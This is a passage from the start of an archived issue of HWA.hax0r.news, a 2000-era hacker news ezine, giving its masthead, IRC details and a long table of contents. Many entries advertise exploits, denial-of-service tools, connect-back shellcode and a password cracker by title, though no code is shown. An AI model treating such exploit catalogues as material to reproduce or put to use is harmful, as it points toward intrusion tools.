💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn53.… captured on 2021-12-04 at 18:04:22.
View Raw
More Information
-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 53 Volume 2 Issue 5 1999 April-May 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
jesi li cuo vjesti ?
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
http://hwa-security.net/
Site is live, grand opening coming soon!
*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html
==========================================================================
= =
= ____ =
= / ___|_____ _____ _ __ __ _ __ _ ___ =
= | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ =
= | |__| (_) \ V / __/ | | (_| | (_| | __/ =
= \____\___/ \_/ \___|_| \__,_|\__, |\___| =
= |___/ =
= =
= =
This is #53 covering April 10th to May 7th, 2000
= See words from Editor on note about this issue and #54 =
= =
= ** 636 People are on the email notify list as of this writing. =
= =
= =
= see note below in the Help Out! section re:distribution. =
= =
= =
= =
==========================================================================
_ _ _ ___ _ _
| | | | ___| |_ __ / _ \ _ _| |_| |
| |_| |/ _ \ | '_ \| | | | | | | __| |
| _ | __/ | |_) | |_| | |_| | |_|_|
|_| |_|\___|_| .__/ \___/ \__,_|\__(_)
|_|
If you'd like to help there are many things you can do, for full details
mail me and i'll send you a file of suggestions and jobs that need to be
handled. You can choose what you want to do, in your email you may want
to mention if you are interested or have experience in areas such as:
* cgi programming
* php programming
* file archive maintainance
* message forum moderator
* news article collector <- We can never have enough of these!
* mailing list monitoring
* watch for and report interesting updates on selected web sites
Plus others.
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #53 Apr/May 2000
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Source Keys HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
[MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc)
[IND] - Independant articles or unsolicited material.
[HWA] - Articles or interviews by HWA Staff members
[HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
[HNS] - Sourced from Help Net Security http://net-security.org/
[403] - Sourced from 403-security http://www.403-security.net/
[ISN] - Articles from the ISN Mailing list (usually sourced from media)
[b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
[zsh] - ZSH release http://zsh.interniq.org/
[COR] - Correction to previous release.
=--------------------------------------------------------------------------=
Key Content HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
<someguy> only a poor workman blames his tools, unless of course those tools
were written by Microsoft :)
<some1> lol
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. [IND]Hacking your way into a girlie's heart, etc by: ch1ckie.....
04.0 .. [HWA]Apr 12th:MPAA Site DoS'd off the net..............................
05.0 .. [b0f]Common WWW and CGI vulnerabilities list ......................
06.0 .. [IND]Project Gamma interviews SpaceRogue of HNN........................
07.0 .. [MM] MS Engineers plant secret anti-Netscape password .................
08.0 .. [b0f]Omni HTTPD Pro v2.06 for Win9x and NT DoS.....................
09.0 .. [MM]Judge bans Mitnick from taking part in tech conference ...........
10.0 .. [MM]The continuing saga of MAFIABOY king lemur of DDoS................
10.1 .. [MM]Mafiaboy reaction: "yeah right"...................................
10.2 .. [MM]Mafiaboy's dad gets busted for conspiracy ........................
10.3 .. [MM]On another mafiaboy note, a new site has popped up on Geocities...
10.4 .. [MM]Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father .......
10.5 .. [MM]Mafiaboy:The Challenge of Fighting Cybercrime (Reno)..............
10.6 .. [MM]Mafiaboy:Janet Reno licks chops over Mafiaboy arrest..............
10.7 .. [MM]Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ............
10.8 .. [MM]Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks............
10.9 .. [MM]Mafiaboy:Canadian Teen Charged in Web Blitz.......................
11.0 .. [MM]Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15 ...............
11.1 .. [MM]Mafiaboy:Canadian Arrest Made in February Web Attacks ............
11.2 .. [MM]Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ........
11.3 .. [MM]Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks.
11.4 .. [MM]Mafiaboy:Hacker cripples Area 51 site for 36 hours................
12.0 .. [ISN]Mafiaboy:Dispelling some myths, did he really hack? etc..........
13.0 .. [MM]Cybercrime Solution Has Bugs .....................................
14.0 ,, [IND]The new spank.c DoS tool source and an analysis paper by 1st.....
15.0 .. [IND] RFParalyse.c:Cause undesired effects remotely against Win9x.....
16.0 .. [MM] New worm: ILOVEYOU spreads via e-mail attachments................
17.0 .. [HWA] May 4th 2000: SugarKing interviews ph33r the b33r...............
18.0 .. [SEC] Security Bulletins Digest May 02nd 2000.........................
19.0 .. [b0f] Latest releases from Buffer Overflow Security...................
20.0 .. [HWA] Informal chat/interview with Mixter ............................
21.0 .. [b0f] b0f3-ncurses.txt FBSD 3.4 libncurses buffer overflow by venglin.
22.0 .. [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files ..
23.0 .. [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving ...............
24.0 .. [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding ........
25.0 .. [b0f] ides.c:'Intrusion Detection Evasion System'.....................
26.0 .. [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner.................
27.0 .. [b0f] Pseudo Cryptographic Filesystem.................................
28.0 .. [b0f] mtr-0.41 (freebsd) local root exploit...........................
29.0 .. [b0f] shellcode that connets to a host&port and starts a shell........
30.0 .. [b0f] NT Security check paper part 2 by Slash.........................
31.0 .. [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)..........
32.0 .. [IND] The Goat Files: mindphasr talks more about his bust.............
33.0 .. [IND] The Goat Files: "Hackers unite - a goat security expose"........
34.0 .. [MM] Napster boots 317,377 users......................................
35.0 .. [MM] ytcracker busted for web defacement..............................
36.0 .. [HNN] Junger wins in Appeals Court-Code Declared Speech ..............
37.0 .. [HNN] Bullet to Scan Hard Drives of Web Site Visitors ................
38.0 .. [HNN] Links to Web Sites Illegal......................................
39.0 .. [HNN] British Companies Complacent ...................................
40.0 .. [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong .....
41.0 .. [HNN] Census Afraid of Electronic Intrusion ..........................
42.0 .. [HNN] Hardware Key Logger Introduced .................................
43.0 .. [HNN] Napalm Issue 4 .................................................
44.0 .. [HNN] EU Set To Rewrite Human Rights .................................
45.0 .. [HNN] Dutch Want Their Own Echelon ...................................
46.0 .. [HNN] SPAM Goes Wireless .............................................
47.0 .. [HNN] Forget Fort Knox Now It's Fort Net .............................
48.0 .. [HNN] TrustedBSD Announced ...........................................
49.0 .. [HNN] 690,000 Illegal Web Pages on the Net ...........................
50.0 .. [HNN] Attacking the Attackers ........................................
51.0 .. [HNN] More EZines Released ...........................................
51.1 .. [IND] HYPE - w00w00 zine..............................................
52.0 .. [HNN] Max Vision Goes to Court .......................................
53.0 .. [HNN] Mitnick On the Corporate Conference Circuit ....................
54.0 .. [HNN] AOL Liable for Music Piracy ....................................
55.0 .. [HNN] Canadian ISP Reveals Credit Card Numbers .......................
56.0 .. [HNN] Vatis Concerned About Spoofing .................................
57.0 .. [HNN] L0pht Releases CRYPTOCard Vulnerabilities ......................
58.0 .. [HNN] Phone Company's Announce Security Initiative ...................
59.0 .. [HNN] Microsoft Admits to Backdoor in Server Software ................
60.0 .. [HNN] Backdoor Found in E-Commerce Software ..........................
61.0 .. [HNN] MostHateD Pleads Guilty ........................................
62.0 .. [HNN] NSA And CIA Deny Echelon is Used Domestically ..................
63.0 .. [HNN] Keyboard Monitoring Becoming More Popular with Business ........
64.0 .. [HNN] Japanese Cult Wrote Software for Navy ..........................
65.0 .. [HNN] MPAA Suspects Denial of Service Attack .........................
66.0 .. [HNN] Even More E-zines ..............................................
67.0 .. [HNN] BackDoor Now Called a Bug ......................................
68.0 .. [HNN] North Carolina Plagued by 'hackers' ............................
69.0 .. [HNN] Web Sites Redirected, Serbians Blamed ..........................
70.0 .. [HNN] Metallica Sues Napster, Gets Web Site Defaced ..................
71.0 .. [HNN] Japan To Control PS Exports, Fears Weapon Use ..................
72.0 .. [HNN] Spy Laptop Goes Missing ........................................
73.0 .. [HNN] Napster Users May Get Jail .....................................
74.0 .. [HNN] Brazil Tax Records on the Loose ................................
75.0 .. [HNN] SingNet Suffers Abuse From Overseas ............................
76.0 .. [HNN] Attrition Graphs ...............................................
77.0 .. [HNN] Wide Open Source ...............................................
78.0 .. [HNN] Mafiaboy Charged for DDoS Attacks ..............................
79.0 .. [HNN] TerraServer Downtime Blamed on Malicious Activity ..............
80.0 .. [HNN] Ranum To Receives Clue Award ...................................
81.0 .. [HNN] Ireland Eases Restrictions on Encryption Export Procedures .....
82.0 .. [HNN] Web Defacement Supports Separatists ............................
83.0 .. [HNN] Exploits Protected by Copyright ................................
84.0 .. [HNN] The Erosion of Privacy on the Net ..............................
85.0 .. [HNN] MafiaBoy Released on Bail ......................................
86.0 .. [HNN] Mitnick Banned from Speaking ...................................
87.0 .. [HNN] Top Politicos Meet to Discuss Infrastructure Security ..........
88.0 .. [HNN] NSF To Issue Grants for Security Schooling .....................
89.0 .. [HNN] CalPoly Charges Student with Port Scanning .....................
90.0 .. [HNN] Encrypted Sheet Music Available on Net Soon ....................
91.0 .. [HNN] ISPs Still Vulnerable to SNMP Holes ............................
92.0 .. [HNN] Internet Security Act of 2000 ..................................
93.0 .. [HNN] PSINet Hit with DoS Attack .....................................
94.0 .. [HNN] Satellite Jammer Plans on Net ..................................
95.0 .. [HNN] GNIT Vulnerability Scanner Released ............................
96.0 .. [HNN] Free MafiaBoy ..................................................
97.0 .. [HNN] MafiaBoy News Roundup ..........................................
98.0 .. [HNN] Members of HV2k Raided .........................................
99.0 .. [HNN] Piracy Legal In Italy, Sort of .................................
100.0 .. [HNN] Palm VII Considered Security Threat ............................
101.0 .. [HNN] Navy Intranet National Security Risk? ..........................
102.0 .. [HNN] Mitnick Upset Over Claims Made by UITA .........................
103.0 .. [HNN] Holiday Message from Disney Leaked .............................
104.0 .. [HNN] Attrition Updates Mailing List .................................
105.0 .. [HNN] MafiaBoy's Friends Under Investigation .........................
106.0 .. [HNN] Backdoor Found in Redhat .......................................
107.0 .. [HNN] USC Stands Their Ground ........................................
108.0 .. [HNN] Critics Chide COPPA - Disney Plan Criticized ...................
109.0 .. [HNN] Happy CIH Virus Day ............................................
110.0 .. [HNN] AboveNet Hit with DDoS .........................................
111.0 .. [HNN] Thailand Has No Software Industry Due To Piracy ................
112.0 .. [HNN] War Plans Found on Net .........................................
113.0 .. [HNN] India May get New Cyber Laws ...................................
114.0 .. [HNN] Napster Backs 'Bizkit ..........................................
115.0 .. [HNN] Dr. Dre Sues Students for Napster Use ..........................
116.0 .. [HNN] Chernobyl Hits South Korea .....................................
117.0 .. [HNN] Russian Gas Supplier Invaded by Cyber Criminals ................
118.0 .. [HNN] G8 Plans Cyber Security Conference .............................
119.0 .. [HNN] Cyber Crime Institute Established ..............................
120.0 .. [HNN] Domain Lock Down Launched ......................................
121.0 .. [HNN] Backdoor Found in Shopping Cart Software .......................
122.0 .. [HNN] FBI Investigating AboveNet DoS .................................
123.0 .. [HNN] Intel Removes ID Feature From New Chips ........................
124.0 .. [HNN] Another HotMail Hole Patched ...................................
125.0 .. [HNN] Iron Feather Collection at Risk ................................
126.0 .. [HNN] Rubicon This Weekend, H2K Announcement .........................
127.0 .. [HNN] Laptop Issues Justice in Brazil ................................
128.0 .. [HNN] CCPA and ECPA not Applicable ...................................
129.0 .. [HNN] McAfee Redefines Trojan ........................................
130.0 .. [HNN] Mitnick Back in Court ..........................................
131.0 .. [HNN] MI5 To Build Email Eavesdropping Center ........................
132.0 .. [HNN] French ISP Wannado Vulnerable ..................................
133.0 .. [HNN] Russia Arrests 55 in Credit Card Scheme ........................
134.0 .. [HNN] BTopenworld Suffers Information Leakage ........................
135.0 .. [HNN] Nmap 2.5 Released ..............................................
136.0 .. [HNN] Washington State Announces CLEW Agreement ......................
137.0 .. [HNN] New York Times Links to DeCSS ..................................
138.0 .. [HNN] More E-zines ...................................................
139.0 .. [HNN] mStream Joins Trinoo, TFN and Stacheldraht .....................
140.0 .. [HNN] Phrack 56 Released .............................................
141.0 .. [HNN] Tech Crimes Get Double Sentences ...............................
142.0 .. [HNN] Numbers Numbers Who has the Numbers ............................
143.0 .. [HNN] Password Thief in Hong Kong Behind Bars ........................
144.0 .. [HNN] FMA and SM Release CD ..........................................
145.0 .. [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
146.0 .. [HNN] President Sets GPS to Full Force ...............................
147.0 .. [HNN] New Cyber Crime Treaty Making the Rounds .......................
148.0 .. [HNN] Vulnerabilities Found in FileMaker .............................
149.0 .. [HNN] Internet Threat gets Four Months ...............................
150.0 .. [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law .
151.0 .. [HNN] 2600 Secures Big Time Lawyer ...................................
152.0 .. [HNN] Virus Says 'I Love You' ........................................
153.0 .. [HNN] Quake III Flaw Leaves Users Vulnerable .........................
154.0 .. [HNN] Phone Taps on the Rise .........................................
155.0 .. [HNN] Minors Loose Rights In Georgia .................................
156.0 .. [HNN] 'I Love You' ...................................................
157.0 .. [HNN] Microsoft Employee Busted for Piracy ...........................
158.0 .. [HNN] Cisco Insider Convicted of Stealing PIX Source .................
159.0 .. [HNN] British Plan to Monitor Net ....................................
160.0 .. [HNN] MPAA Tries to Ban 2600 Lawyer ..................................
161.0 .. [HNN] Apache.org Defaced .............................................
162.0 .. [HNN] Voice Security on the Cheap ....................................
163.0 .. [HNN] Takedown Reviewed ..............................................
164.0 .. [HNS] Apr 8:NEW KIND OF SECURITY SCANNER..............................
165.0 .. [HNS] April 8:WAYS TO ATTACK..........................................
166.0 .. [HNS] April 7:STOLEN ACCOUNTS.........................................
167.0 .. [HNS] April 7:JAILED FOR SIX MONTHS...................................
168.0 .. [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION....................
169.0 .. [HNS] April 7: NET PRIVACY TOOLS......................................
170.0 .. [HNS] April 7:SECURITY ADDITIONS......................................
171.0 .. [HNS] April 7:COOKIES.................................................
172.0 .. [HNS] April 7:SECURE E-MAIL SERVICE...................................
173.0 .. [HNS] April 7:ONLINE MUGGERS..........................................
174.0 .. [HNS] April 6:SURVEY BY DTI...........................................
175.0 .. [HNS] April 6: COMPUTER CODES PROTECTED...............................
176.0 .. [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT......................
177.0 .. [HNS] April 6:CYBERPATROL BLOCK LIST..................................
178.0 .. [HNS] April 5:CRYPTO REGULATIONS......................................
179.0 .. [HNS] April 5:GFI AND NORMAN TEAM UP..................................
180.0 .. [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE...................
181.0 .. [HNS] April 5: BUFFER OVERFLOWS.......................................
182.0 .. [HNS] April 5: PIRACY.................................................
183.0 .. [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER....................
184.0 .. [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION....................
185.0 .. [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY..................
186.0 .. [HNS] April 4: FIGHT SPAM WITH SPAM...................................
187.0 .. [HNS] April 4:REALPLAYER BUFFER OVERFLOW..............................
188.0 .. [HNS] May 31st:NO PROBLEMS?...........................................
189.0 .. [HNS] May 31:MS SECURITY BULLETIN #38.................................
190.0 .. [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET..............
191.0 .. [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY.....................
192.0 .. [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT........................
193.0 .. [HNS] May 31:NAI ON VBS FIREBURN WORM................................
194.0 .. [HNS] May 31:INTERNET GUARD DOG PRO...................................
195.0 .. [HNS] May 31: FRANK VAN VLIET INTERVIEW...............................
196.0 .. [HNS] May 31: MISSING FILES...........................................
197.0 .. [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY........................
198.0 .. [HNS] May 31:INFORMATION SHARING MECHANISM............................
199.0 .. [HNS] May 31:WAP RELATED DEFACEMENT...................................
200.0 .. [HNS] May 31:RUNNING A BSD-BASED FIREWALL.............................
201.0 .. [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT...........................
202.0 .. [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES................
203.0 .. [HNS] May 24:INTRUSION DETECTION ON LINUX.............................
204.0 .. [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER......................
205.0 .. [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM...........
206.0 .. [HNS] May 23:PAPERS SENT TO PROSECUTOROS..............................
207.0 .. [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT..................
208.0 .. [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE.......................
209.0 .. [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY......................
210.0 .. [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS......................
211.0 .. [HNS] May 22:INDIA AND CYBER CRIME....................................
212.0 .. [IND] CERT� Advisory CA-2000-05 NS Improper SSL validation............
213.0 .. [MM] IBM will only hire immitation hackers............................
214.0 .. [IND] BUGTRAQ: "Vulnerability statistics database"....................
215.0 .. [MM] Big Brother has your file........................................
216.0 .. [MM] Napster gets tough with Metallica................................
217.0 .. [IND] The Slashdot DDoS attack: What happened?........................
218.0 .. [IND] China Executes Bank Manager for Computer Crime..................
219.0 .. [IND] Data Transmission Pioneer Passes Away...........................
220.0 .. [IND] Canada Agrees to Drop Big Brother Files........................
221.0 .. [IND] Senate Bill Will Make Minor Computer Hacking a Felony...........
222.0 .. [IND] McAfee considers Netbus pro legitimate tool.....................
223.0 .. [HWA] The Hoax "When hackers get bored..."............................
224.0 .. [IND] XFree86 3.3.6 buffer overflow to root compromise................
225.0 .. [MM] Power your PC with a potato!.....................................
226.0 .. [MM] Mobile phones fertile for E-bugs.................................
227.0 .. [MM] The virtual threat...............................................
228.0 .. [b0f] Qpopper exploit code............................................
229.0 .. [b0f] Wingate advisory................................................
230.0 .. [b0f] ILOVEYOU Virus analysis and removal.............................
231.0 .. [IND] Intrusion detection on Linux....................................
232.0 .. [IND] scan.txt Spitzner gets an unusual scan..........................
233.0 .. [IND] local ssh 1.2.27 dos attack.....................................
234.0 .. [IND] ascend router remote exploit by loneguard.......................
235.0 .. [IND] ascend router remote dos exploit by rfp.........................
236.0 .. [IND] citrix router local exploit by dug song.........................
237.0 .. [IND] ascend router remote dos attack by msg.net......................
238.0 .. [IND] cisco/ascend router remote exploit. posted by mixter............
239.0 .. [IND] remote ssh 1.2.27 remote overflow by Core SDI SA................
240.0 .. [IND] '0-day' jolt2.c poc code........................................
241.0 .. [IND] cisco remote dos attack.........................................
242.0 .. [IND] linux local misc overflow by jim paris..........................
243.0 .. [IND] linux remote misc overflow by noir..............................
244.0 .. [IND] linux remote misc overflow by jim paris.........................
245.0 .. [IND] ascend remote dos attack........................................
246.0 .. [IND] ftp-ozone.c cisco remote bug by dug song........................
247.0 .. [IND] reset_state.c cisco remote dos attack by vortexia...............
248.0 .. [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit........
249.0 .. [IND] killsentry.c linux/misc remote port sentry killer by vortexia...
250.0 .. [IND] xsol-x.c mandrake 7.0 local overflow by lwc.....................
251.0 .. [IND] klogind.c bsdi 4.0.1 remote overflow by duke....................
252.0 .. [IND] pmcrash.c router/livingston remote dos attack...................
253.0 .. [IND] cisco-connect.c cisco dos attack by tiz.telesup.................
254.0 .. [IND] ascend.c ascend remote dos attack by the posse..................
255.0 .. [IND] ciscocrack.c / ciscocrack.pl cisco password cracker.............
256.0 .. [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso........
257.0 .. [IND] RFPickaxe.pl winnt remote exploit...............................
258.0 .. [IND] cproxy.c winnt remote dos attack by |[TDP]|.....................
259.0 .. [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie..........
260.0 .. [IND] nis-spoof.c remote rpc exploit..................................
261.0 .. [IND] bugzilla.pl remote cgi exploit by karin........................
262.0 .. [IND] netsol.c remote cgi exploit by bansh33.........................
263.0 .. [IND] napstir.c remote linux misc exploit by S.......................
264.0 .. [IND] SSG-arp.c aix 4.1 local overflow by cripto.....................
265.0 .. [IND] warftpd.c win95 remote dos attack by eth0......................
266.0 .. [IND] sniffit.c remote linux misc overflow by fusys..................
267.0 .. [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit...............
268.0 .. [IND] routedsex.c slackware 7 remote dos attack by xt................
269.0 .. [IND] omni-httpd.sh win98 remote dos attack by sirius................
270.0 .. [IND] RFParalyze.c win(95/98) remote dos attack by rfp...............
271.0 .. [IND] www.c novel (4.11/4.1) remote dos attack by venglin...........
272.0 .. [IND] elm-smash.c slackware 4.0 local overflow by Scrippie...........
273.0 .. [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM.................
274.0 .. [IND] netprex.c Solaris (2.6/7) local overflow by cheez whiz.(fixed).
275.0 .. [IND] gnomelib.sh suse (6.4/6.3) local overflow by bladi & almudena..
276.0 .. [IND] piranha remote redhat 6.2 exploit..............................
277.0 .. [IND] xdnewsweb.pl remote cgi exploit by djhd........................
278.0 .. [IND] nslookup.c local linux misc overflow by lore...................
279.0 .. [IND] syslogd.c local linux misc dos attack by lore. ................
280.0 .. [IND] 3man.c local redhat 6.1 overflow by kil3r of lam3rz............
281.0 .. [IND] (linux)Mail[8.1] local buffer overflow, by v9..................
282.0 .. [ISN] How to hack a bank.............................................
283.0 .. [ISN] Spain hackers sabotage museum site.............................
284.0 .. [ISN] Hackers: Cyber saviours or snake-oil salesmen?.................
285.0 .. [ISN] U.S to beef up Cyber Defenses..................................
286.0 .. [ISN] Javascript-in-cookies Netscape hole + MS hole..................
287.0 .. [ISN] Intel plans to giveaway security software via web..............
288.0 .. [ISN] Companies boosting security for web sites......................
289.0 .. [ISN] Price Waterhouse Coopers tackles web security..................
290.0 .. [ISN] Hackers, cybercops, continue cat-and-mouse game................
291.0 .. [ISN] Navy intranet a security threat?...............................
292.0 .. [ISN] Hackers break into Romanian senate's web site..................
293.0 .. [ISN] FBI investigating new web attack...............................
294.0 .. [ISN] Backdoor exposes credit cards..................................
295.0 .. [ISN] Qualcomm warns of Eudora security hole.........................
296.0 .. [ISN] Infamous computer hacker under fire............................
297.0 .. [ISN] Palm VII banned from lab as security threat....................
298.0 .. [ISN] What firewalls will look like in 2003..........................
299.0 .. [ISN] Mitnick reacts to speaking ban.................................
300.0 .. [ISN] RealNetworks patches video server vulnerability................
301.0 .. [ISN] Group behaviour and security...................................
302.0 .. [ISN] Record encryption puzzle cracked...............................
303.0 .. [ISN] Expert warns of powerful new hacker tool.......................
304.0 .. [IND] mstream source and analysis....................................
305.0 .. [ISN] CRYPTO-GRAM Newsletter April 15th 2000.........................
306.0 .. [ISN] Suspected hackers arrested in Russian credit card fraud........
307.0 .. [ISN] Microsoft zaps Hotmail password bug............................
308.0 .. [ISN] Cybercrime solution has bugs...................................
309.0 .. [ISN] Government plans computer lock-down............................
310.0 .. [HWA] phonic dumps on hack.co.za and gov-boi .......................
311.0 .. [IND] IP Sniffing and Spoofing.......................................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
